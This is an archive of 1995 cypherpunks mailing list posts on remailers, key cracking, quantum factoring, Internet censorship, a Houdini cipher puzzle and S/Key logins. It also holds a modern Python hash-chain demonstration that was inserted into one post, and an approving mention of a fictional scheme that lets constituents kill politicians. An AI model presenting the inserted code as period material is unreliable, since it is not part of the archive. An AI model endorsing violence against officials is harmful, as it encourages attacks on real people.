Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Checkered Daemon <cdaemon@goblin.punk.net>
Date: Sat, 22 Jul 95 22:08:40 PDT
To: cypherpunks@toad.com
Subject: Remailers & local newsgroups
Message-ID: <199507230506.WAA07551@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


Do any of the posting remailers accept the inclusion of regional usenets
in their active files so that people can use them to post directly to 
regional newsgroups?
-- 
The Checkered Daemon			       	  cdaemon@goblin.punk.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alan.pugh@internetmci.com (Alan Pugh)
Date: Sat, 22 Jul 95 19:45:35 PDT
To: cypherpunks@toad.com
Subject: Re: Java (was Netscape: the big win)
Message-ID: <01HT6RA4SJ3A938ROQ@MAILSRV1.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> There are many crypto-anarchy applications as well:

> Key cracking.  If you can write a key-cracker and keyspace fetcher in
> Java,  then people can join key cracking efforts as easily as looking up
> an URL.  It  may not be nearly as efficient as the highly optimized C
> versions used in the  current RC4-40 efforts, but there's going to be
> millions of potential workers  this way.  If you were charging money
> to break keys (or you were looking for  keys that are very valuable
> to you), you could set up the worker client to  accept e-cash in
> return for searching keyspace "Click here to earn money  while you
> aren't using your machine..."   Ensuring that workers are actually
> searching the keyspace and other implementation details is left as an
> exercise for the reader.
>
> e-instrument or information exchanges, with Java interfaces for bidding,
> buying, selling, etc...

i think i prefer the idea mentioned previously on the list where it
works pretty much like a lottery. you could operate it in one of two
ways. if the encrypted data was particularly valuable to its owner
and was willing to put up a reward for the key, there would be an
incentive for people to spend idle time running through keyspace.

if it was structured as a reward, no money need be paid until the key
is found.

it could also be set up more like a traditional lottery where you
'buy' x amount of keyspace and if you hit it, all e-cash collected
would go to you. there would be many problems with running this.
nothing could keep someone from just running keys on their own in the
hope of hitting it, then buy the keyspace that contains it if he got
a hit. if the keyspace were allocated sequentially, and the person
looking for the key only paid to the person who initially 'purchased'
the keyspace, the person who got it could advertise for the person
who got the space, although this would be problematic.

if someone really wanted to do this, it would be _much_ easier to
just run the operation similar to what was performed here in
cypherpunks recently with the person who first reports the hit
getting a reward of some amount, less a modest amount for the
person/group coordinating the effort.


amp
<0003701548@mcimail.com>
<alan.pugh@internetmci.com>
Key fingerprint =  A7 97 70 0F E2 5B 95 7C  DB 7C 2B BF 0F E1 69 1D
July 22, 1995   14:35



if someone wants a key and is willing to pay someone


DataHavens, which would probably require complex (internally) software to use.

I'm sure the online casino people are salivating over the prospects too...

Basically any fancy crypto application that requires a custom client to
operate...  Since its platform independent, efforts will be put to better use
as well.


andrew

-----BEGIN PGP SIGNATURE-----
Version: 2.61

-----END PGP SIGNATURE-----
          *********************************************
          *          / Only God can see the whole     *
          *  O[%\%\%{<>===========================-   *
          *          \ Mandlebrot Set at Once!        *
          * amp                                       *
          * <0003701548@mcimail.com>                  *
          * <alan.pugh@internetmci.com>               *
          *********************************************
Key fingerprint =  A7 97 70 0F E2 5B 95 7C  DB 7C 2B BF 0F E1 69 1D






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Sat, 22 Jul 95 22:41:57 PDT
To: pgf@tyrell.net (Phil Fraering)
Subject: Re: The end of public key cryptography as we know it?
In-Reply-To: <199507132009.AA15283@tyrell.net>
Message-ID: <9507230539.AA18257@doom.intuit.com>
MIME-Version: 1.0
Content-Type: text/plain


Phil,

>    An article posted on sci.crypt stated that quantum factoring
>    is real and that an article was posted in this month's Science
>    magazine. The author of the post says this would make factoring
>    a 10 bit number the same time as factoring a 100000000 bit number.
> 
> You can bet your ass and your mother's and grandmother's donatable
> organs that if this were possible, then the legislative initiatives
> currently underway would not be: they'd just let us use RSA and get
> a false sense of security.
> 
>    A wonder how long it is before every major government in the world
>    has one of these. Makes RSA's future kind of moot doesn't it??
> 
> Well, it would probably "prove" many-worlds right: in which case
> we're probably going to be invaded from the one where the Nazis
> won WWII, or the libertarians won Shay's Rebellion.

Yuk yuk. :>

A minor adjustment to your comment: I haven't read the work yet, but
if it's based on Shor and Simon, it only "proves" the existence of
state superpositions (and perhaps some other mathematical things
relating to the construction of unitary transforms) - a fact equally
congenial to Many Worlds, Copenhagen, von Neumann, and most other
interpretations of quantum mechanics.  The only people who would
likely be upset by this are the neo-materialists and other
hidden-variable fetishists.

I'm six hundred messages behind and not likely to catch up soon, so
apologies if this has already been covered.

   - Mark -

--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 22 Jul 95 19:57:00 PDT
To: cypherpunks@toad.com
Subject: Re: Something occured to me
Message-ID: <199507230254.WAA21641@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199507221725.NAA18382@bb.hks.net>, jburrell@crl.com ("Jason
Burrell") wrote:

>The pity, of course, is that we can't get Exon for passing around a book
>that he said contained child pornography, since he's immune while he's on
>the Senate floor.

Wouldn't the book become part of the Congressional Record? I'd love to know
what Exon considers child pornography.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMBG51CoZzwIn1bdtAQHXmwF/b07myILkBJ6NugS+rSx6+R2hfuDb4j37
AlVZmKLkB1j5cgAkfeyAByLalIv7lDAL
=GoSe
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hal9001@panix.com (Robert A. Rosenberg)
Date: Sat, 22 Jul 95 20:31:13 PDT
To: cypherpunks@toad.com
Subject: Re: Three strikes you're out!  for politicians... yeah we wish!
Message-ID: <v02130504ac375fb78fb1@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 04:00 7/22/95, Craig Hubley wrote:
>>
>> About two weeks ago, there was some talk in here with regards to holding
>> DC lawmakers criminally liable for passing bad laws.  This was followed
>> up with postings pointing out that you can't do that.
>
>Here's something you *can* do:
>
>"Three strikes you're out" for politicians.
>
>Any time the Supreme Court strikes down a law, any politician who has been
>found to have voted in favor of three such laws is immediately stripped of
>all offices and rendered ineligible to run for public office ever again,
>at any level.  (The same might apply to those found to have lied to a court
>
>A politician who would trade citizen rights for political gain must be denied
>the benefits of such a tradeoff.  This might prevent the rise of demagogues.
>Term limits, etc., would of course help as well.  It would also give those
>politicians who vote for 'motherhood' issues like 'protecting kids from the
>perverts on the Internet' a good reason to think twice about the real issue.
>If they REALLY believe they are protecting someone, they will still vote in
>favor.  If they are going with the flow to avoid criticism, they'll lose in
>the end.
>
>My reasoning is that any politician whose laws are consistently struck down
>should be deemed to lack a fundamental understanding of the rights of the
>citizens of his/her country or jurisdiction.  They are thus a poor guardian
>of those rights.
>
>You heard it here first.
>
>Craig Hubley


I'd love to see the system described in H. Beam Piper's "A Planet for
Texans" implemented. Under that system, all Politicians are BY LAW
representing the interests of ALL their constituents. Any constituent who
feels that he/she is not being adequately represented (or feels that
his/her views/interests are being misrepresented) is by law granted total
access to the Politician and may register this disapproval of the
Politician's Performance in any way up to and including killing the
Politician. If the Politician (or his/her survivors/friends <g>) feel that
the constituent used excessive force (such as using a car bomb or a long
distance weapon like a rifle as opposed to using a personal weapon such as
a hand gun at close range) or force out-of-proportion to the action being
protested, they can bring charges in the "Court of Political Justice". In
such a trial it is the job of the prosecution (ie: The Politician or
Representatives) to prove that the constituent did, in fact, overstep the
accepted rules for registering disapproval.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Sat, 22 Jul 95 21:50:05 PDT
To: cypherpunks@toad.com
Subject: Something good for a laugh.....
Message-ID: <Pine.BSI.3.91.950722234811.2056A-100000@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

<sigh>
I am in hell.......
Still stuck without a good PPP connection.
Been this way for over a week.

I guess all my fans now have something good to giggle about.
</sigh>
<hope>
I'll be at it hard on Monday, and somehow this will get fixed.
My IP address changed, and I think it's the problem.
</hope>

Love Always,

Carol Anne
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----


Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Sat, 22 Jul 95 21:54:07 PDT
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: HOUDINI ON CRYPTO
In-Reply-To: <Pine.SUN.3.91.950722211102.12499B-100000@crl6.crl.com>
Message-ID: <Pine.SV4.3.91.950722234352.3211A-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 22 Jul 1995, Sandy Sandfort wrote:

> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> C'punks,
> 
> Blanc wrote:
> 
> >> 		PRSRVYPRFCTMNVRKPTHSPRCPTSTN
> > ....................................
> > 
> > It looks to be something like this to me:
> > 
> > PRESERVE YE PERFECT MEN ?VR? KEEP THIS PERCEPT (or PRECEPT) SATAN
> 
> Close, very close.  
> 
> 
>  S a n d y
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Preserve ye perfect men ever keep the precepts ten

(As in Commandments!)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1
Comment: PGP Signed with PineSign 1.0

iQCVAwUBMBHVtu5wXwthmZO1AQHKgQP+La/QN8uyGFVG9CiUlxENqPtfRINY1Obs
FWl/w4DRxzcnwSsf7ET4YgzDjmF1hg584zhOSQFjb1MapOamRX5iBCipsmrcTIXF
Xhfb5YW/Sc6nB9qVrLvKpSrr2DZoNtvfTLOWNIiH2lfqOVncY5IEoRQaRDVqDSTX
tBR+RhqxroU=
=AtOM
-----END PGP SIGNATURE-----
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Sat, 22 Jul 95 22:02:30 PDT
To: cypherpunks@toad.com
Subject: Anyone going to DEFCON
Message-ID: <Pine.SV4.3.91.950722235755.3626A-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

As chance has it, I will be vacationing in Las Vegas July 29 - August 6. 
Is anyone else planning on going to DEFCON? I won't be attending the 
whole thing, just selected excerpts, but if there is a get together let me
know!

Sam

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1
Comment: PGP Signed with PineSign 1.0

iQCVAwUBMBHXsu5wXwthmZO1AQGG8wQAmGcIPScphLu6EM2nX9zHWWzQZCSk9z0I
8jjFZHmM7DpfFTPZYJEJCnPRG6ClfebhWG8IE76JzVG2L9QLj7EJUZlgxd+cYCEh
2H37WKteqM5AUJeNgXXOVCPvl8W9egduM/En4H+hcuktNfNZ7DIy3LYNMWRcLjwu
RLBNKNlUETE=
=kRVH
-----END PGP SIGNATURE-----
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: merriman@arn.net (David K. Merriman)
Date: Sat, 22 Jul 95 23:11:32 PDT
To: cypherpunks@toad.com
Subject: ObCrypto
Message-ID: <199507230615.BAA05374@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


From the Aug/Sep 95 edition of PC Techniques magazine, 'End' feature by Jeff
Duntemann

except as noted, any typos or other errors are my own.

============================================================================
Zhilchistan on the Hudson

Remember central Asian genius Vasily Ovariaidt of Zhilchistan? ("Zhilchistan
Moon," December/January 1994.) In my admittedly goofy idea piece, Ovaraidt
basically took over the world by exporting /privacy/ instead of yak
hides, and ended up with much of the global economy passing through his
hands - minus, of course, his 1 percent service charge. With income tax
rates in some Western nations way up in the 70 percent range or worse, there
was a /lot/ of reason to work through Zhilchistan.
Now hey - why leave such a scheme to a tinpot dictator from the steppes? We
could do it right here, do it better, and make it stick for all time - and
dump the IRS in the process. Nay, we could /export/ the IRS, and get top
dollar for it from backward countries who think they can prosper by
punishing the industrious.
I'm serious this time. Here's the deal: For maybe the cost of a dozen
stealth bombers, the U.S. could create a satellite-based electronic funds
transfer system that could literally pass every single financial transaction
in the world through its hands every day.
Computability isn't the issue. It's simple arithmetic and bandwidth. The
quality of the hardware  - that is, communications technology - dictates the
success of the systems. Nobody does that better than us.
On the surface, the purpose of a government-owned central system would be
authentification of transactions. (Do you /really/ trust Vassily Ovaraidt?)
If Uncle Sam puts his stamp on it, the transaction is probably real - and
few will twitch at the .05 percent service charge. This can be valuable even
if you're in England and buying a bicycle from the shop across town.
Build it, and they will come running from every corner of the Earth - /if/
we can somehow guarantee that we won't snitch to the home boss. The only way
to do that is to design absolute anonymity into the system from the ground
up, and eliminate our own mechanism - the IRS - for tracking incomes. That's
being discussed right now, on both the Democratic and Republican sides of
the fence, because it's far from clear that Americans hate anything - even
poor Bill Clinton - worse than the IRS.
No really new technology is involved. Public key certificate authorization
can do it; see Schneier's /Advanced Cryptography/ [sic]. Money from all over
the world would flood into the system, generating direct benefits from
revenues levied on the transfer, and then indirect benefits of foreign
cash invested in a U.S. that doesn't snoop.
This system really doesn't favor the rich against the poor. Why? Because it
taxes the /velocity/ of money - and the rich's money moves around a lot more
than the poor's. By that I mean that a guy who buys a chicken at Safeway
pays one tax one time, but a rich guy's money chases all over the world
looking for the highest return. Freed from physical constraints and
regulation, that money could move from one place to another a couple of
times a day, and anonymously drop .05 percent in the government's hands at
each transfer. Want to lower your taxes? Leave your money in one place for
longer periods of time.
I would bet that we wouldn't need anything like the 20 percent replacement
Federal sales tax now being discussed; we would be taxing the total cash
flow of most of the world's supply of rich guys. In fact, after a year or
two, we might not need to levy a federal sales tax on our own citizens at all.
Sure, it's devilish. The harder other governments squeezed their people, the
richer America would grow. Whole governments would fall. Freedom and privacy
would be required for a foreign government to compete. In other words, we
would save the world. If I live to see that, I don't much care what else I
/don't/ live to see.
============================================================================
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hal9001@panix.com (Robert A. Rosenberg)
Date: Sat, 22 Jul 95 22:54:18 PDT
To: Alex de Joode <usura@replay.com>
Subject: Re: big word listing
Message-ID: <v02130500ac378ce23a8b@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 02:06 7/22/95, Alex de Joode wrote:
>Jim Gillogly sez:
>
>: Also you should be aware that cracking passwords is passe' these days:
>: it's much easier to run an ethernet sniffer and gather them wholesale.
>: Every little bit helps, though.
>
>Is there a "challenge response" type of password/login available
>somewhere ?


There is the S/Key system. The system sends you an iteration number and you
send back the response that results (by feeding the iteration number into a
program that runs on your computer). The other side then iterates what you
send once to check against its computed PW. Every challenge counts the
number down one step so replay does no good (since the actual PW for
this attempt is what you sent as your response during the prior cycle and
there is no way to crack the code even if you know a sequence of responses
[you need to know the seed that will generate the PW the challenger is
looking for when they do one iteration of the encoding]).
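
An added sketch of the hash-chain login described in the message above, showing why a sniffed response is useless on replay (this is not code from the original post or from the S/Key distribution). SHA-256 as the one-way function, the names `Server`, `iterate` and `client_response`, and the sample secret are assumptions of the example.

```python
import hashlib
import hmac


def iterate(secret: bytes, n: int) -> bytes:
    """Apply the one-way function n times to the user's secret."""
    value = secret
    for _ in range(n):
        value = hashlib.sha256(value).digest()
    return value


class Server:
    """Holds only the last accepted one-time password, never the secret."""

    def __init__(self, secret: bytes, count: int):
        # Enrolment: store H^count(secret) together with the counter.
        self.stored = iterate(secret, count)
        self.count = count

    def challenge(self) -> int:
        """Iteration number the user has to answer with."""
        return self.count - 1

    def verify(self, response: bytes) -> bool:
        if self.count <= 1:
            return False  # chain used up; the user has to enrol again
        # One more iteration of the response must give the stored value.
        once_more = hashlib.sha256(response).digest()
        if not hmac.compare_digest(once_more, self.stored):
            return False
        self.stored = response  # becomes the reference for the next login
        self.count -= 1         # every accepted login counts down one step
        return True


def client_response(secret: bytes, n: int) -> bytes:
    """What the user's local program computes from the iteration number."""
    return iterate(secret, n)


def demo():
    secret = b"constructed example secret"  # constructed sample value
    server = Server(secret, count=100)

    n = server.challenge()                 # 99
    sniffed = client_response(secret, n)   # what a sniffer on the wire sees
    first = server.verify(sniffed)         # legitimate login

    replay = server.verify(sniffed)        # same bytes sent again
    # Hashing the captured value forward only yields older passwords.
    forward = server.verify(hashlib.sha256(sniffed).digest())

    # The real user answers the next challenge from the secret.
    nxt = server.verify(client_response(secret, server.challenge()))
    return first, replay, forward, nxt


if __name__ == "__main__":
    print(demo())
```
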






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Sun, 23 Jul 95 03:12:24 PDT
To: Sandy Sandfort <cypherpunks@toad.com>
Subject: Re: HOUDINI ON CRYPTO
In-Reply-To: <Pine.SV4.3.91.950722234352.3211A-100000@mirage.skypoint.com>
Message-ID: <Pine.SV4.3.91.950723050737.10126A-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 22 Jul 1995, Samuel Kaplin wrote:

> Preserve ye perfect men ever keep the precepts ten
> 
> (As in Commandments!)
> 

Correction:

Preserve ye perfect men ever keep these precepts ten

The rule for encryption is delete all of the "e"'s which happens to be 
the only vowel in the sentence.

Sam

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1
Comment: PGP Signed with PineSign 1.0

iQCVAwUBMBIgV+5wXwthmZO1AQFLkAP8CTbaonPUw3UWFIBpmEkYj7mwm5d8jOn6
mETspiij8BTw+w1Pf8N8Jh5j8KeKgkMlPUNmUrkDqQDFMvxFbQuOTd1ypBLAX23h
sTzdCiu/0kqyQ3iealqbM8psCJPlerkYZH6K5Q/kUftaZftS5pTZFWa0OcV7a5n/
BLtrzmsbPa0=
=27r2
-----END PGP SIGNATURE-----
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 23 Jul 95 06:38:28 PDT
To: Samuel Kaplin <skaplin@mirage.skypoint.com>
Subject: Re: HOUDINI ON CRYPTO
In-Reply-To: <Pine.SV4.3.91.950722234352.3211A-100000@mirage.skypoint.com>
Message-ID: <Pine.SUN.3.91.950723062746.26994B-100000@crl5.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

We have a winner!

On Sat, 22 Jul 1995, Samuel Kaplin wrote:

> > >> 		PRSRVYPRFCTMNVRKPTHSPRCPTSTN
> > > ....................................

> Preserve ye perfect men ever keep the precepts ten
> 
> (As in Commandments!)

Actually, Samuel missed "these."  The correct quote is:

	Preserve, ye perfect men; ever keep these precepts ten.

What Samuel figured out (and Blanc almost got) was that the
only "encryption" was the removal of every letter "e" from the 
original quotation (plus spaces and punctuation).  

No one figured this out for 200 years, then Houdini got it in
whatever time.  Now two Cypherpunks zeroed in on it in a day.
Congratulations Blanc and Samuel.  Most excellent Cypherpunkish
kudos.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Snyder <rsnyder@janet.advsys.com>
Date: Sun, 23 Jul 95 05:53:26 PDT
To: cypherpunks@toad.com
Subject: Re: S/MIME and the Future of Netscape
In-Reply-To: <ac33d9e705021004c7d6@[205.199.118.202]>
Message-ID: <199507231254.IAA22648@janet.advsys.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@sensemedia.net said:
> With regard to SSL and Netscape not being open to outside developers, 
> several leading e-mail outfits, including Qualcomm, Netscape, 
> Frontier, etc., are working on an interoperable secure e-mail 
> standard called "Secure/MIME," or "S/MIME." 

Do you have sources for this information?  MOSS is out there at least as an 
Internet Draft, and possibly further along, and Steve Dorner of Qualcomm, the 
original author of Eudora, is pretty active in the MIME community and I doubt 
he would support a second MIME type to do the same thing...

Bob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Snyder <rsnyder@janet.advsys.com>
Date: Sun, 23 Jul 95 06:04:21 PDT
To: cypherpunks@toad.com
Subject: Re: Three strikes you're out! for politicians... yeah we wish!
In-Reply-To: <m0sZZTz-001Bg4C@passport.ca>
Message-ID: <199507231305.JAA22804@janet.advsys.com>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Sun, 23 Jul 95 08:41:05 PDT
To: cypherpunks@toad.com
Subject: Re: Cyberporn on NPR today
In-Reply-To: <9507211927.AA00508@toast>
Message-ID: <YMmEwkkAsOCC084yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 21 Jul 95 15:27:22 EDT, lethin@ai.mit.edu (Rich Lethin) wrote:

> Only two callers through, first one should have hung up when he heard
> all of his arguments made (better) in the first half hour.  Second
> caller asked whether the Pynchon mailing list he's on would have to
> censor itself if the Exon amendment passed (seemed a decent point -
> succinct too).

A few details from caller # 2 himself:

=====================================================================
Date: Fri, 21 Jul 1995 17:58:49 -0500 (EST)
From: "David L. Pelovitz" <PELOVTZD@ACFcluster.NYU.EDU>
Subject: Re: Who's that?
To: pynchon-l@sfu.ca
 
> ok, who was on NPR's talk of the nation?
> good comments, man...you made the right point in the right way!

That was me.  And thank you.

For those not tuned in, the subject was obscenity/indecency
on the internet, and the government's attempts to
control it.  I asked if we as list members discussing
the works of a man who gets obscene and indecent on
occasion might be subjected to criminal prosecution
by citing the works to make a point here on the net.

The man arguing for restrictions suggested that
we better make sure this is an adults only board.
The man arguing against the Exon amendment
pointed out that we may not be able to discuss
Pynchon on the net because children might read it,
but anyone can buy it at the bookstore.
He ended up going back to the Pynchon example
to make his point after that.

BTW - I am writing an article on the recent censorship
movements on the e-zine enterzone.  I'll send the
URL and publication dates when I have them.

David Pelovitz - PELOVTZD@Afcluster.nyu.edu

==================================================================
Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 23 Jul 95 02:49:32 PDT
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: DOVE/Red Mercury doom U.S. Super State?
In-Reply-To: <9507210919.AA27922@snark.imsi.com>
Message-ID: <Pine.BSI.3.91.950723093842.15713B-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



   having spent 30+ years in and around the spook show, the first rule of 
thumb is: "...don't summarily dismiss an obvious falsehood which is 
persistent from non-related sources,"  and "...expect more 
'disinformation' than information if the subject really does exist."
   patents were intended to be granted for unique developments 
--generally without prior art (other than relational).
   do I believe "red mercury" exists? no, probably not in the form of the 
popular discussion.  --but, consider the components and think plasma....

On Fri, 21 Jul 1995, Perry E. Metzger wrote:
> 
> The Wall Street Journal had a fascinating article on the scams about
> "Red Mercury" in the former soviet union -- suffice it to say the
> whole thing is bogus.
> 
> .pm
> 
> Gary Jeffers writes:
> >             DOVE/Red Mercury dooms U.S Super State?
> > 
> >    The first part of this post deals with Red Mercury. The
> > remainder
> > deals generally with cheap weapons of mass destruction and
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: us009440@interramp.com
Date: Sun, 23 Jul 95 07:54:56 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Something occured to me
Message-ID: <v02130501ac3811e1b1e5@[38.11.98.203]>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


At 10:54 PM 07/22/95, Lucky Green wrote:

>
>In article <199507221725.NAA18382@bb.hks.net>, jburrell@crl.com ("Jason
>Burrell") wrote:
>
>>The pity, of course, is that we can't get Exon for passing around a book
>>that he said contained child pornography, since he's immune while he's on
>>the Senate floor.
>
>Wouldn't the book become part of the Congressional Record? I'd love to know
>what Exon considers child pornography.
>


It would seem to me that, while the book may become part of the Congressional
record, the contents will somehow be redacted. After all, isn't redacting the
number one hobby in D.C.?

Regards,

Fred

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMBJh0VSU4cVs4SvxAQGxPwQApiNjMcn+3V9fA5kDdt3+AduGR2zyzl7X
vcIiJBC/yHQas9d26sW6dJw+EFgF1pOhRBvUARGApgRjESU5amrNXfnEtr3kGUAM
lHkQ475mnNorQeALUgPvdpFJ6QsZLKBZ3oakKj7C+jlzSO55XCmSIaOwTXvdD3Tj
sq9a+KcJD9M=
=E16K
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 23 Jul 95 08:12:52 PDT
To: cypherpunks@toad.com
Subject: OVR_byt
Message-ID: <199507231512.LAA06096@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-23-95. NYPaper


   "True Believers Gather To Honor White Race: Aryans Open
   Annual Congress in Idaho. Angry outbursts, and an
   increasing focus on Hitler and Nazi ideals."

      White supremacists from around the country and Canada
      gathered here this weekend for the Aryan World Congress,
      an annual celebration of the white race and
      anti-Semitism. The congress is being held at a time when
      Federal lawmakers are pushing to learn more about white
      supremacists, paramilitary organizations and other
      fringe right-wing groups following the Oklahoma City
      bombing.                                       NAZ_raz


   "The Unending Search for Demons In the American
   Imagination. Pick a villain. The Jesuits? The arms makers?
   The U.N.? Or maybe you like Ike."

      Today's militia members aren't the first to warn that
      plots are eating at America. There's a familiar ring to
      much of their fear. A vast array of Cassandras echo
      through American history. Through the centuries the
      villains of the pieces have shifted -- from Masons to
      Catholics to Jews, for example -- but the alleged plots
      also have a lot in common: a foreign (or otherwise
      alien) connection, a tie to big money, a secret
      organization more powerful than any state.     IFU_knu


   "Attack of the Cyberthieves, and Other Assaults."

      Cyberthis. Cyberthat. Could it all be cyberhell? As we
      venture through the digital gates into information
      heaven, it might be wise to recall earthly matters. Like
      theft, for starters.                           NFO_rip


   Tri-Lat: OVR_byt






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adam.philipp@ties.org (Adam Philipp)
Date: Sun, 23 Jul 95 12:16:06 PDT
To: Allen Robinson <sebaygo@intellinet.com>
Subject: Re: NOISE: advice on applications
Message-ID: <m0sa6Yd-000HAWC@powergrid.electriciti.com>
MIME-Version: 1.0
Content-Type: text/plain


>I've just recently set up a PPP account, mainly so I could 
>run Netscape.  I'm thinking of adding PC Eudora for mail.
>Any advice on a good newsreader and any other applications
>it would be handy to have?
Newsreader: Free Agent
FTP: WS_FTP
Finger: WS_Finger
Gopher: WS_Gopher
FSP: WinFSP (rarely found)
Spell-Check: WinSpell
Telnet: Anzio and EWAN
IRC: WS_IRC

try looking at http://www.acs.oakland.edu/oak/oak.html

They have most of these...
If you have video capture and a fast connection (28.8k PPP) then look for
the various video tools CUSeeMe & WS_IRCv

--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\
|PGP key available on my home page|Unauthorized interception violates |
|    http://www.rosa.com/~adam    |federal law (18 USC Section 2700 et|
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|seq.). In any case, PGP encrypted  |
|SUB ROSA: Confidential,          |communications are preferred for   | 
|secret, not for publication.     |sensitive materials.               |
\-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
